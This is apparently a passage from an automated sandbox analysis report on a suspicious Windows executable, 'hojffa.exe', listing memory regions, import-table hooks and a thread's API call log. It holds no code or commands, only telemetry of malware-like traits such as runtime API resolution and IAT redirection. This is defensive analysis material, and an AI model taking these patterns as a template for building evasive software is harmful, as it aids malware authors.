kernelbase.dll 0x76ab0000 0x76af5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76b00000 0x76b8ffff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x76b90000 0x76d8afff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76d90000 0x76da8fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76de0000 0x76e14fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76e80000 0x76f8ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76f90000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77050000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x770f0000 0x771bbfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x771c0000 0x772affff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000772b0000 0x772b0000 0x773cefff Private Memory Readable, Writable, Executable True False False -
private_0x00000000773d0000 0x773d0000 0x774c9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x774d0000 0x77678fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77680000 0x77684fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x776b0000 0x7782ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 84 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x0000000000210000:+0xbec 1. entry of hojffa.exe 4 bytes kernel32.dll:SetFileShortNameW+0x0 now points to pagefile_0x0000000000650000:+0xe0065
IAT private_0x0000000000210000:+0xbec 4. entry of hojffa.exe 4 bytes kernel32.dll:FileTimeToSystemTime+0x0 now points to pagefile_0x0000000000650000:+0xd0066
IAT private_0x0000000000210000:+0xbec 5. entry of hojffa.exe 4 bytes kernel32.dll:LoadLibraryW+0x0 now points to hojffa.exe:+0x2002d
IAT private_0x0000000000210000:+0xbec 7. entry of hojffa.exe 4 bytes kernel32.dll:GetProcAddress+0x0 now points to pagefile_0x0000000000650000:+0xf0069
IAT private_0x0000000000210000:+0xbec 8. entry of hojffa.exe 4 bytes kernel32.dll:CreateMailslotW+0x0 now points to hojffa.exe:+0x3002d
IAT private_0x0000000000210000:+0xbec 10. entry of hojffa.exe 4 bytes kernel32.dll:FlushFileBuffers+0x0 now points to pagefile_0x0000000000650000:+0x7006e
IAT private_0x0000000000210000:+0xbec 11. entry of hojffa.exe 4 bytes ntdll.dll:RtlDecodePointer+0x0 now points to hojffa.exe:+0x2002d
IAT private_0x0000000000210000:+0xbec 13. entry of hojffa.exe 4 bytes kernel32.dll:SetLastError+0x0 now points to pagefile_0x0000000000650000:+0x9006e
IAT private_0x0000000000210000:+0xbec 16. entry of hojffa.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to pagefile_0x0000000000650000:+0xf0070
IAT private_0x0000000000210000:+0xbec 19. entry of hojffa.exe 4 bytes kernel32.dll:IsProcessorFeaturePresent+0x0 now points to pagefile_0x0000000000650000:+0xd0073
IAT private_0x0000000000210000:+0xbec 21. entry of hojffa.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x00000000002a0000:+0x30050
IAT private_0x0000000000210000:+0xbec 22. entry of hojffa.exe 4 bytes kernel32.dll:GetCurrentThreadId+0x0 now points to private_0x0000000000550000:+0xc004c
IAT private_0x0000000000210000:+0xbec 23. entry of hojffa.exe 4 bytes kernel32.dll:GetSystemTimeAsFileTime+0x0 now points to pagefile_0x0000000000650000:+0x90074
IAT private_0x0000000000210000:+0xbec 25. entry of hojffa.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to pagefile_0x0000000000650000:+0x110073
IAT private_0x0000000000210000:+0xbec 28. entry of hojffa.exe 4 bytes kernel32.dll:RtlUnwind+0x0 now points to pagefile_0x0000000000650000:+0x150061
IAT private_0x0000000000210000:+0xbec 29. entry of hojffa.exe 4 bytes ntdll.dll:RtlEnterCriticalSection+0x0 now points to hojffa.exe:+0x1002d
IAT private_0x0000000000210000:+0xbec 30. entry of hojffa.exe 4 bytes ntdll.dll:RtlLeaveCriticalSection+0x0 now points to private_0x00000000002a0000:+0x3005a
IAT private_0x0000000000210000:+0xbec 31. entry of hojffa.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to pagefile_0x0000000000650000:+0x140043
IAT private_0x0000000000210000:+0xbec 32. entry of hojffa.exe 4 bytes kernel32.dll:InitializeCriticalSectionAndSpinCount+0x0 now points to pagefile_0x0000000000650000:+0x70072
IAT private_0x0000000000210000:+0xbec 34. entry of hojffa.exe 4 bytes kernel32.dll:TlsGetValue+0x0 now points to pagefile_0x0000000000650000:+0x73
IAT private_0x0000000000210000:+0xbec 37. entry of hojffa.exe 4 bytes kernel32.dll:FreeLibrary+0x0 now points to pagefile_0x0000000000650000:+0xe006d
IAT private_0x0000000000210000:+0xbec 38. entry of hojffa.exe 4 bytes kernel32.dll:LoadLibraryExW+0x0 now points to hojffa.exe:+0x2002d
IAT private_0x0000000000210000:+0xbec 40. entry of hojffa.exe 4 bytes kernel32.dll:GetModuleHandleExW+0x0 now points to pagefile_0x0000000000650000:+0x150075
IAT private_0x0000000000210000:+0xbec 41. entry of hojffa.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to private_0x0000000000550000:+0x2d
IAT private_0x0000000000210000:+0xbec 42. entry of hojffa.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x00000000002a0000:+0x3005a
IAT private_0x0000000000210000:+0xbec 43. entry of hojffa.exe 4 bytes kernel32.dll:GetModuleFileNameA+0x0 now points to pagefile_0x0000000000650000:+0x140043
IAT private_0x0000000000210000:+0xbec 44. entry of hojffa.exe 4 bytes kernel32.dll:MultiByteToWideChar+0x0 now points to pagefile_0x0000000000650000:+0x70072
IAT private_0x0000000000210000:+0xbec 46. entry of hojffa.exe 4 bytes kernel32.dll:GetACP+0x0 now points to pagefile_0x0000000000650000:+0x100071
IAT private_0x0000000000210000:+0xbec 47. entry of hojffa.exe 4 bytes kernel32.dll:HeapFree+0x0 now points to private_0x00000000002a0000:+0x3007a
IAT private_0x0000000000210000:+0xbec 48. entry of hojffa.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to hojffa.exe:+0x30045
IAT private_0x0000000000210000:+0xbec 50. entry of hojffa.exe 4 bytes kernel32.dll:GetConsoleCP+0x0 now points to pagefile_0x0000000000650000:+0xd0061
IAT private_0x0000000000210000:+0xbec 53. entry of hojffa.exe 4 bytes kernel32.dll:GetFileType+0x0 now points to pagefile_0x0000000000650000:+0x3007a
IAT private_0x0000000000210000:+0xbec 56. entry of hojffa.exe 4 bytes kernel32.dll:FindFirstFileExA+0x0 now points to pagefile_0x0000000000650000:+0x64
IAT private_0x0000000000210000:+0xbec 57. entry of hojffa.exe 4 bytes kernel32.dll:FindNextFileA+0x0 now points to hojffa.exe:+0x1002d
IAT private_0x0000000000210000:+0xbec 59. entry of hojffa.exe 4 bytes kernel32.dll:GetOEMCP+0x0 now points to pagefile_0x0000000000650000:+0x90065
IAT private_0x0000000000210000:+0xbec 60. entry of hojffa.exe 4 bytes kernel32.dll:GetCPInfo+0x0 now points to hojffa.exe:+0x1002d
IAT private_0x0000000000210000:+0xbec 62. entry of hojffa.exe 4 bytes kernel32.dll:GetCommandLineW+0x0 now points to pagefile_0x0000000000650000:+0xe0065
IAT private_0x0000000000210000:+0xbec 65. entry of hojffa.exe 4 bytes kernel32.dll:SetStdHandle+0x0 now points to pagefile_0x0000000000650000:+0xd0066
IAT private_0x0000000000210000:+0xbec 66. entry of hojffa.exe 4 bytes kernel32.dll:GetProcessHeap+0x0 now points to hojffa.exe:+0x3002d
IAT private_0x0000000000210000:+0xbec 68. entry of hojffa.exe 4 bytes kernel32.dll:WriteConsoleW+0x0 now points to pagefile_0x0000000000650000:+0xd0073
IAT private_0x0000000000210000:+0xbec 70. entry of hojffa.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x00000000002a0000:+0x30050
IAT private_0x0000000000210000:+0xbec 71. entry of hojffa.exe 4 bytes kernel32.dll:RaiseException+0x0 now points to pagefile_0x0000000000650000:+0x140043
Threads
Thread 0x7d0
365 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:54:13 (UTC) True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x739d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76e94f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76e94208 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x739d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll, function = InitializeCriticalSectionEx, address_out = 0x0 False 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 2
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76e94f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76e91252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76e94208 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 2
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76f147f1 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Load module_name = kernel32.dll, base_address = 0x76e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x76e9168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76e9435f True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x76e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x76e91856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76e9435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x76e9186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x76e93519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76ead802 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x76e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76e91809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x76e91136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x76e91986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76e910ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76e94950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x76e93f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x7770d598 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76e911c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76e91222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76e97a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x76e91245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x76e91410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76e911f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x76e91ae5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x76e949d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76e91700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x76e97a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x76e934d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76eb7aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x76eac807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x76e9435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x76e9195e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x76f1454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x76e91328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x76f37bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x76e9469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineA, address_out = 0x76e951a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76e911a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76e91450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x776f0fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x776e9d35 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76e94a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76e9192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76e9170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x76e914e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76e951b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x76e93531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776e45f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76e94d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76e914b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76e91282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76e91725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76e93509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76e951e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76e951cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76e94a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76e95235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76eb772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76e987c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76e91916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76ead802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76e949ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76e911e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76e914fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76e93587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76e934b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x776d22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x776d2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76e914c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x76e94493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76e9179c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x76ebd1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x76e95189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76e9495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x76ebd1d4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x776de026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x776f1f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x76e91946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x776e3002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x76e917b9 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x759f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetFocus, address_out = 0x75a12175 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75a09679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x75a0fc5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x75a12320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x75a07d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x75a078e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75a07809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x75a0787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetForegroundWindow, address_out = 0x75a2f170 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x776e25dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x75a0b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75a08a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75a09a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75a10dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = keybd_event, address_out = 0x75a602bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75a13559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowTextW, address_out = 0x75a120ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongW, address_out = 0x75a06ffe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x75a08332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x75a090d3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetAncestor, address_out = 0x75a09785 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x776b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlUnwind, address_out = 0x776f6d39 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x73910000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x7392c544 True 1
Fn
System Get Time type = System Time, time = 2018-06-04 08:54:14 (UTC) True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x76e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76e94f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x76e9359f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76e91252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76e94208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76e94d28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x76f1410b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x76f14195 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x76e9d31f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x76eaee7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x776f441c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x7771c50e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x7771c381 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x76eaf088 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x777005d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x7771ca24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x776d0b8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x7778fde8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77721e1d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x76f14761 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x76f0cd11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x76f1424f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x76f146b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x76f26676 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x76f14751 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x76f265f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x76f147c1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x76f147e1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76f147f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x76eaeee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 260 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 256 True 2
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x76e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76e910ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76ead802 True 1
Fn
